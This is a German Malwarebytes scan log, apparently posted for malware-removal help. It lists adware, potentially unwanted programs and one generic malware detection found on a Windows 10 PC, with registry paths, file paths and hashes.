Drive j: (TOSHIBA EXT) (Fixed) (Total:2794.39 GB) (Free:230.1 GB) NTFS
Drive w: (Daten) (Network) (Total:195.31 GB) (Free:172.93 GB) NTFS
\\?\Volume{79857743-b9df-46b3-96bf-e4e8d9a3cd63}\ () (Fixed) (Total:0.49 GB) (Free:0.04 GB) NTFS
\\?\Volume{71e4b085-1259-4f2a-94a3-b1ef97ec4058}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partitionstabelle ====================
==================== Ende von Addition.txt ======================= --- --- --- Code:
Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 02.12.20
Scan-Zeit: 21:31
Protokolldatei: 6d351cec-34dd-11eb-ba81-704d7b85adae.json
-Softwaredaten-
Version: 4.2.3.96
Komponentenversion: 1.0.1122
Version des Aktualisierungspakets: 1.0.33772
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 10 (Build 19041.630)
CPU: x64
Dateisystem: NTFS
Benutzer: DESKTOP-HRMFF6U\Tom
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 415817
Erkannte Bedrohungen: 41
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 2 Min., 26 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung
-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)
Modul: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 18
PUP.Optional.WebDiscoverBrowser, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\WebDiscover Browser Update Task, Keine Aktion durch Benutzer, 1741, 255155, , , , , ,
PUP.Optional.WebDiscoverBrowser, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A9488763-4F15-4C35-96F7-11315EA3F955}, Keine Aktion durch Benutzer, 1741, 255155, , , , , ,
PUP.Optional.WebDiscoverBrowser, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{A9488763-4F15-4C35-96F7-11315EA3F955}, Keine Aktion durch Benutzer, 1741, 255155, , , , , ,
PUP.Optional.WebDiscoverBrowser, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\WebDiscoverBrowser, Keine Aktion durch Benutzer, 1741, 253912, 1.0.33772, , ame, , ,
PUP.Optional.StartFenster, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Startfenster-Replace.de, Keine Aktion durch Benutzer, 494, 350112, , , , , ,
PUP.Optional.SearchManager, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\icmgebopaejnjlncllgmcenbbflikfjd, Keine Aktion durch Benutzer, 441, 521971, 1.0.33772, , ame, , ,
RiskWare.Script.Base64, HKU\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\aedffcbccbfe, Keine Aktion durch Benutzer, 6465, 883372, 1.0.33772, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\AM, Keine Aktion durch Benutzer, 3395, 401432, 1.0.33772, , ame, , ,
PUP.Optional.eSupportUndeletePlus, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\ESUPPORT.COM\UndeletePlus, Keine Aktion durch Benutzer, 3035, 355410, 1.0.33772, , ame, , ,
Adware.KeenValue, HKLM\SOFTWARE\WOW6432NODE\Updater, Keine Aktion durch Benutzer, 6953, 212959, 1.0.33772, , ame, , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Keine Aktion durch Benutzer, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Keine Aktion durch Benutzer, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Keine Aktion durch Benutzer, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Keine Aktion durch Benutzer, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}, Keine Aktion durch Benutzer, 193, 236865, 1.0.33772, , ame, , ,
PUP.Optional.eSupportUndeletePlus, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\eSupport UndeletePlus_is1, Keine Aktion durch Benutzer, 3035, 355411, 1.0.33772, , ame, , ,
PUP.Optional.StartFenster, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\Startfenster-Replace.exe, Keine Aktion durch Benutzer, 494, 350115, 1.0.33772, , ame, , ,
PUP.Optional.StartFenster, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\Startfenster-Replace.exe, Keine Aktion durch Benutzer, 494, 350115, 1.0.33772, , ame, , ,
Registrierungswert: 6
PUP.Optional.WinYahoo, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Keine Aktion durch Benutzer, 240, 311488, 1.0.33772, , ame, , ,
RiskWare.Script.Base64, HKU\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\aedffcbccbfe|0, Keine Aktion durch Benutzer, 6465, 883372, 1.0.33772, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\AM|STARTFENSTER-REPLACE, Keine Aktion durch Benutzer, 3395, 401432, 1.0.33772, , ame, , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Keine Aktion durch Benutzer, 193, 236865, 1.0.33772, , ame, , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TOPRESULTURL, Keine Aktion durch Benutzer, 193, 236865, 1.0.33772, , ame, , ,
PUP.Optional.WebDiscoverBrowser, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A9488763-4F15-4C35-96F7-11315EA3F955}|PATH, Keine Aktion durch Benutzer, 1741, 184039, 1.0.33772, , ame, , ,
Registrierungsdaten: 1
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Keine Aktion durch Benutzer, 193, 293058, 1.0.33772, , ame, , ,
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 4
PUP.Optional.StartFenster, C:\PROGRAM FILES (X86)\STARTFENSTER-REPLACE, Keine Aktion durch Benutzer, 494, 350112, 1.0.33772, , ame, , ,
PUP.Optional.eSupportUndeletePlus, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ESUPPORT.COM\ESUPPORT UNDELETEPLUS, Keine Aktion durch Benutzer, 3035, 355413, 1.0.33772, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, C:\USERS\TOM_ADMIN\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTFENSTER-REPLACE, Keine Aktion durch Benutzer, 3395, 401566, 1.0.33772, , ame, , ,
PUP.Optional.Spigot.Generic, C:\USERS\TOM\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\4EKS1494.DEFAULT\BROWSER-EXTENSION-DATA\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e, Keine Aktion durch Benutzer, 199, 662625, 1.0.33772, , ame, , ,
Datei: 12
PUP.Optional.WebDiscoverBrowser, C:\WINDOWS\SYSTEM32\TASKS\WebDiscover Browser Update Task, Keine Aktion durch Benutzer, 1741, 255155, 1.0.33772, , ame, , 4F0FBEBB61783CAB5855D4DB82E1EE0A, CD90F3BDA997D8C301B7E0C87552AA0FCA8B80F14C2C0D1C5B5BE21ECDBA0F53
PUP.Optional.StartFenster, C:\PROGRAM FILES (X86)\STARTFENSTER-REPLACE\LOGO.ICO, Keine Aktion durch Benutzer, 494, 350112, 1.0.33772, , ame, , BDCF63C89B22A44CDF5B1BE184714A26, C333C15AC24C7820F8E613E6878F1823514E15618CBBFE16161405CDE5270A39
PUP.Optional.StartFenster, C:\Program Files (x86)\Startfenster-Replace\uninstall.exe, Keine Aktion durch Benutzer, 494, 350112, , , , , 56F998A44AAE1BF48DB4CE759517E31B, BC8DE31C4DE56F0421100BB5AC080F8A40CD47E7849723583D30378653327818
PUP.Optional.SearchManager, C:\USERS\VINCENT\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\NIU7SHOJ.DEFAULT\EXTENSIONS\{24436206-088D-4A1A-8D0E-CF93CA7A2D23}.XPI, Keine Aktion durch Benutzer, 441, 733885, 1.0.33772, , ame, , E9BCE1FC758D9AFCFA92592D427312DA, 8A09ACBCD0CC91A846AB8E2513AF8C160D4F7C6B342B60121EB20628A1328B18
PUP.Optional.Spigot.Generic, C:\USERS\TOM\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\4EKS1494.DEFAULT\EXTENSIONS\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e.xpi, Keine Aktion durch Benutzer, 199, 662624, 1.0.33772, , ame, , A9B894B4D518452B7522FCBA4CEF0673, 90AE7D0A96109274FA54EE0E53D47442DCA5F08674633960A4A299ABDB075911
PUP.Optional.eSupportUndeletePlus, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com\eSupport UndeletePlus\eSupport UndeletePlus.lnk, Keine Aktion durch Benutzer, 3035, 355413, , , , , 42F1D8DBCA8CB18FF5C36DC89F1FAFC1, 4229C74E3B8530EAFD99EB0B7D50EADDB6745C569E0B2A1F5A09E5EB47F5EDBB
PUP.Optional.eSupportUndeletePlus, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com\eSupport UndeletePlus\Uninstall eSupport UndeletePlus.lnk, Keine Aktion durch Benutzer, 3035, 355413, , , , , 140439A5DAA3CEA5AFC63CC6E83068B1, 2A5FE3C801B36BDFD18E5AF7976B3380355FA823CD4322CF3CF24D0A52B835A3
PUP.Optional.StartFenster.ShrtCln, C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace\Software deinstallieren.lnk, Keine Aktion durch Benutzer, 3395, 401566, , , , , 0A944014F0EBD04BC6386FF32E5DE927, 3FC9D0B6D7B7AAF7FDCC87450F1C58FA350741DCB74212A1F4EC58AD89423C36
PUP.Optional.StartFenster.ShrtCln, C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace\Startfenster.lnk, Keine Aktion durch Benutzer, 3395, 401566, , , , , 1F0FFCD941BEC47D7D9186C34F6C97B4, 116B1FDBB69A3731B244036A455D252140D75F4C09D1BA9F74AA404EBEB1F1D0
PUP.Optional.Spigot.Generic, C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\browser-extension-data\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e\storage.js, Keine Aktion durch Benutzer, 199, 662625, , , , , E9C7F12032B73FEE5DAC2E520D9AC60A, 21D271A57088C03F4C55ADB8FD086CB34B06BD2008F1F2C05738963A29A74CCD
PUP.Optional.Conduit, C:\USERS\TOM_ADMIN\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\IYJ5BKBT.DEFAULT\PREFS.JS, Keine Aktion durch Benutzer, 193, 301520, 1.0.33772, , ame, , 5EC0434210134476D036A110840945A2, 8013D1D55EE47F1389225E045FF77B21A2754084E06CD44AA2D2B393E886EBE6
Malware.AI.1525941520, C:\USERS\VINCENT\APPDATA\ROAMING\RANEDERAPEC.EXE, Keine Aktion durch Benutzer, 1000000, 0, 1.0.33772, E5140C4E025428235AF40510, dds, 01010609, AD67167956438A373574B70F13A891DE, 12D44A206BD530963648282C84EB1F7BEB74ACE7C12BCC62612B250FF5C4E854
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
WMI: 0
(keine bösartigen Elemente erkannt)
(end) |